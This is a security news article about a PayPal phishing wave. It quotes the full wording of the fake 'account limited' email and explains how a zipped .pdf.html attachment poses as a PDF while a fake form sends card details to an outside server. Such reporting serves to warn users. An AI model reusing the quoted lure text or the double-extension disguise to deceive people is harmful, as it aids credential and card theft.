14 DAY TRIAL // A new wave of PayPal phishing emails carrying a fake form allegedly intended for account information update purposes, has been hitting people’s inboxes since yesterday.
The rogue emails purport to come from “PayPal.com” and bear a subject of “Your account has been temporarily limited !”
The body contains the PayPal logo and a message instructing users to fill in and submit the attached form. It reads:
“Hello customer, Your account has been temporarily limited.
- We attached to this email a confirmation form to update your details .
- Please download an extract it .
- Submitting this form you will unlimit and restore your PayPal account .
- If you are using Internet Explorer please allow ActiveX for scripts to perform all data transfers securely .
Thank you.
Thanks for using PayPal - the safer, easier way to pay and get paid online.”
The attached archive is called PayPal.com_Account_Confirmation_Form.pdf.zip and contains a file called PayPal.com_Account_Confirmation_Form.pdf.html.
The double extension is meant to trick users on operating systems automatically hiding the known file extensions, like Windows Vista and 7, into thinking the file is a PDF document.
When opened, the HTML displays a page that mimics the look and feel of the PayPal website and displays a form asking for personal and credit card information.
“Obviously, even though well dressed, this information isn't meant to go to PayPal to unlock your account, instead once the ‘Submit Profile’ button is pressed, your information is then posted to an IP that doesn't belong to PayPal at all,” warns Fred Touchette, a senior security analyst at messaging security vendor AppRiver.
The IP address suggests the server where phished information get stored is located in the Islamic Republic of Iran.
eBay-owned PayPal has been the phishers' favorite target for years now. According to statistics released by antivirus vendor Avira, in October PayPal accounted for over 57% of all phishing attacks on the Internet.